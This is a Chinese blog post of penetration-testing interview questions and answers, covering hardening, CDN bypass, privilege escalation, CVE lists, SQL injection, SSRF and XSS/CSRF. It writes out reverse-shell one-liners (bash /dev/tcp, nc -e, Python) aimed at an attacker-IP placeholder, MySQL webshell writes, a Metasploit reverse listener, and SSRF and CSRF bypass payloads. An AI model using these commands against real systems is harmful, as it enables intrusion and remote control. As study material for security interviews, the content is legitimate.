当前位置: 首页 > news >正文

2025年渗透测试面试题总结-拷打题库09(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

2025年渗透测试面试题总结-拷打题库09

1. Linux系统加固降权思路

2. 系统后门检测工具

3. 绕过CDN获取真实IP

4. 给定网站的渗透思路

5. Windows与Linux提权思路

6. 开源组件高危漏洞(10+)

7. 反弹Shell命令及选择

8. CMD查询远程开放端口

9. IIS+PHP+MySQL渗透思路

10. 查询MySQL表列名

11. SQL头注入点

12. PHP命令执行函数

13. SSRF漏洞防御与绕过

14. MySQL写Shell方法

15. Metasploit反向监听命令

16. 应急响应步骤

17. 反向代理工具

18. 同源策略(SOP)

19. XSS的用途

20. XSS类型与防御

21. 存储型XSS原理

22. 快速发现XSS位置

23. DOM型XSS与反射型区别

24. 清空Referer的方法

25. Cookie的Security属性

26. XSS漏洞快速定位

27. XSS/CSRF/CRLF区别

28. CSRF不带Referer访问

2025年渗透测试面试题总结-拷打题库09

Windows、Linux、数据库的加固降权思路,任选其一
你使用什么工具来判断系统是否存在后门
如何绕过CDN获取目标网站真实IP,谈谈你的思路?
如果给你一个网站
谈一谈Windows系统与Linux系统提权的思路?
列举出您所知道的所有开源组件高危漏洞(十个以上)
反弹shell的常用命令?一般常反弹哪一种shell?为什么?
CMD命令行如何查询远程终端开放端口
服务器为IIS+PHP+MySQL,发现root权限注入漏洞,讲讲你的渗透思路
请写出Mysql5数据库中查询库’helloworld’中’users’表所有列名的语句
SQL头注入点
php中命令执行涉及到的函数
SSRF漏洞的成因防御绕过
mysql写shell有几种方法
Metasploit打开反向监听的命令
应急响应的步骤
有哪些反向代理的工具?
什么是同源策略?
XSS能用来做什么?
XSS的三种类型,防御方法
存储型xss原理?
你怎么理解xss攻击?
如何快速发现xss位置?
Domxss原理/防范
DOM型XSS与反射型XSS区别?
如何使得前端referer为空
cookie参数,security干什么的
如果SRC上报了一个XSS漏洞,payload已经写入页面,但未给出具体位置,如何快速介入?
XSS,CSRF,CRLF比较容易弄混,说说三者的原理,防御方法
csrf如何不带referer访问

1. Linux系统加固降权思路

核心措施

  1. 最小化权限
    • 使用chmod 750限制敏感目录权限(如/etc)。
    • 通过visudo限制用户sudo权限。
  2. 禁用高危服务
    • 关闭不必要的服务:systemctl disable telnet
    • 禁用Root远程登录:修改/etc/ssh/sshd_configPermitRootLogin no
  3. 日志监控
    • 配置auditd监控敏感操作(如文件修改、用户提权)。

2. 系统后门检测工具

常用工具

  • Rootkit检测
    • rkhunter --check(扫描隐藏文件、异常进程)。
    • chkrootkit(检测已知Rootkit特征)。
  • 网络分析
    • netstat -antp(检查异常连接)。
    • lsof -i :可疑端口(定位进程)。

3. 绕过CDN获取真实IP

技术手段

  1. 历史DNS记录
    • 使用SecurityTrails查询目标域名历史解析记录。
  2. 子域名探测
    • 通过subfinder扫描子域名(部分子域名可能未配置CDN)。
  3. SSL证书匹配
    • Censys中搜索相同证书的IP地址。
  4. 邮件服务器溯源
    • 分析邮件头中Received字段获取服务器IP。

4. 给定网站的渗透思路

步骤

  1. 信息收集
    • Whois查询、目录扫描(dirsearch -u http://target)。
  2. 漏洞探测
    • SQL注入:sqlmap -u "http://target/?id=1"
    • 文件上传:测试绕过.htaccess限制。
  3. 权限提升
    • 利用内核漏洞(dirtycow)或配置错误(SUID)。

5. Windows与Linux提权思路

Windows提权

  • 服务路径滥用sc config VulnService binPath= "C:\shell.exe"
  • 令牌窃取:利用incognito模仿SYSTEM令牌。

Linux提权

  • SUID提权find / -perm -4000 2>/dev/null
  • 内核漏洞:利用CVE-2021-4034(Polkit提权)。

6. 开源组件高危漏洞(10+)

组件/漏洞CVE/影响
Log4j2CVE-2021-44228(RCE)
Apache Struts2S2-045(远程代码执行)
Spring CloudCVE-2022-22963(SpEL注入)
Fastjson反序列化RCE(1.2.24及以下)
DrupalCVE-2018-7600(Drupalgeddon2)
ThinkPHP多版本RCE(如5.x路由注入)
ElasticsearchCVE-2015-1427(Groovy脚本执行)
OpenSSLHeartbleed(CVE-2014-0160)
JenkinsCVE-2018-1000861(RCE)
NginxCVE-2013-2028(栈溢出)

7. 反弹Shell命令及选择

常用命令

  • Bashbash -i >& /dev/tcp/攻击IP/端口 0>&1(兼容性强)。
  • Netcatnc -e /bin/sh 攻击IP 端口
  • Python
    pythonimport socket,os,pty;s=socket.socket();s.connect((" 攻击IP",端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh") 

首选原因:Bash广泛支持且无需额外依赖。


8. CMD查询远程开放端口

命令

cmdnetstat -ano | findstr "ESTABLISHED" # 查看已连接端口 telnet 目标IP 端口 # 手动测试端口连通性 

9. IIS+PHP+MySQL渗透思路

  1. 利用SQL注入
    • 通过UNION SELECT写入WebShell:SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE 'C:/inetpub/wwwroot/shell.php'
  2. UDF提权
    • 上传恶意DLL并创建函数执行系统命令。
  3. 横向移动
    • 利用数据库凭证尝试登录其他服务(如SSH、远程桌面)。

10. 查询MySQL表列名

语句

sqlSELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='helloworld' AND TABLE_NAME='users';

11. SQL头注入点

常见注入位置

  • HTTP头字段
    • User-AgentX-Forwarded-ForCookie
      示例
httpGET / HTTP/1.1 User-Agent: ' UNION SELECT 1,2,3 -- 

12. PHP命令执行函数

高危函数

  • system("whoami")
  • exec("cat /etc/passwd")
  • shell_exec("id")
  • passthru("ls")

13. SSRF漏洞防御与绕过

维度内容
成因未校验用户输入的URL参数
防御限制协议(仅HTTP/HTTPS)、禁用重定向
绕过使用http://127.0.0.1@evil.com 或IPv6

14. MySQL写Shell方法

  1. INTO OUTFILE:需FILE权限和可写路径。
  2. 日志文件
    sqlSET GLOBAL general_log_file='/var/www/shell.php'; SET GLOBAL general_log=ON;

15. Metasploit反向监听命令

bashmsfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 攻击IP set LPORT 端口 run 

16. 应急响应步骤

  1. 隔离网络:断开受感染主机网络。
  2. 取证分析:使用Volatility分析内存镜像。
  3. 清除后门:删除恶意文件并修复漏洞。
  4. 恢复监控:部署HIDS(如Osquery)。

17. 反向代理工具

  • Nginx:高性能,支持负载均衡。
  • Apache:模块化设计,兼容性强。
  • HAProxy:专用于TCP/HTTP流量分发。

18. 同源策略(SOP)

定义:浏览器限制脚本仅访问同协议、域名、端口的资源。
示例https://a.com 无法读取https://b.com 的Cookie。


19. XSS的用途

  1. 窃取Cookiedocument.cookie 发送至攻击者服务器。
  2. 钓鱼攻击:伪造登录框诱导用户输入凭证。
  3. 会话劫持:通过JavaScript操作用户会话。

20. XSS类型与防御

类型防御方法
存储型输入过滤(如htmlspecialchars
反射型输出编码 + 设置HttpOnly Cookie
DOM型避免eval(),使用textContent替代

21. 存储型XSS原理

流程:用户输入恶意脚本 → 存储至数据库 → 其他用户加载页面时执行。
示例:留言板插入<script>alert(1)</script>


22. 快速发现XSS位置

  1. 输入点测试
    • 表单、URL参数、HTTP头(如Referer)。
  2. 自动化扫描
    • 使用XSStrikeBurp Suite扫描反射点。

23. DOM型XSS与反射型区别

  • DOM型:漏洞在客户端解析阶段触发,无需服务器参与。
  • 反射型:恶意脚本经服务器返回后执行。

24. 清空Referer的方法

  1. HTML标签
    html<meta name="referrer" content="no-referrer">
  2. JavaScript
    javascriptwindow.location.href = 'http://target?data=xxx';

25. Cookie的Security属性

作用:仅通过HTTPS传输Cookie,防止中间人窃取。
设置Set-Cookie: session=123; Secure


26. XSS漏洞快速定位

  1. 代码审计:搜索innerHTMLdocument.write 等高风险函数。
  2. 输入模糊测试:插入<img src=x onerror=alert(1)>观察是否弹窗。

27. XSS/CSRF/CRLF区别

漏洞原理防御方法
XSS恶意脚本在用户浏览器执行输入编码 + CSP策略
CSRF伪造用户身份发起请求Token校验 + SameSite Cookie
CRLF注入换行符控制HTTP头/日志过滤\r\n + 严格校验输入

28. CSRF不带Referer访问

绕过方法

  1. 使用<meta>标签跳转
    html<meta http-equiv="refresh" content="0; url=http://bank.com/transfer?to=attacker"> 
  2. HTTPS页面发起请求:部分浏览器允许HTTPS页面不发送Referer。

相关文章:

  • Windows1909,21H2哪个版本更稳定
  • 小刚说C语言刷题——1039 求三个数的最大数
  • 1️⃣4️⃣three.js_Stats性能监视器
  • 机器学习中,什么叫监督学习?什么叫非监督学习?
  • 25.解决中医知识问答删除历史对话功能后端处理请求时抛出异常
  • 【大数据、数据开发与数据分析面试题汇总(含答案)】
  • OpenCV训练题
  • 【Redis】Redis 特性
  • L1-1、Prompt 是什么?为什么它能“控制 AI”?
  • 爱普生TG-5006CG成为提升5G RedCap时钟同步精度的理想选择
  • ECA 注意力机制:让你的卷积神经网络更上一层楼
  • 【Pandas】pandas DataFrame sub
  • FreeRTOS互斥信号量解决优先级翻转实战教程
  • 大模型中超参数TopK是什么
  • 批量创建同名文件夹并整理文件至对应文件夹
  • ElementUI中checkbox v-model绑定值为布尔、字符串或数字类型
  • Docker如何更换镜像源提高拉取速度
  • NLP高频面试题(四十八)大语言模型中的思维链(CoT)技术详解
  • LintCode第192题-通配符匹配
  • 解决 Ubuntu 下 VTune 无法收集 CPU 硬件时间计数数据的问题
  • 安徽一季度GDP为12265亿元,同比增长6.2%
  • 高架上2名儿童从轿车天窗探出身来,驾驶员被记3分罚200元
  • 上海农房翻建为何难?基层盼政策适度松动
  • 《大家聊中国式现代化》明天全网推出
  • 北京理工大学:教师宫某涉嫌师德失范,暂停其一切职务活动
  • 2025扬州“烟花三月”国际经贸旅游节开幕,37个重大项目现场签约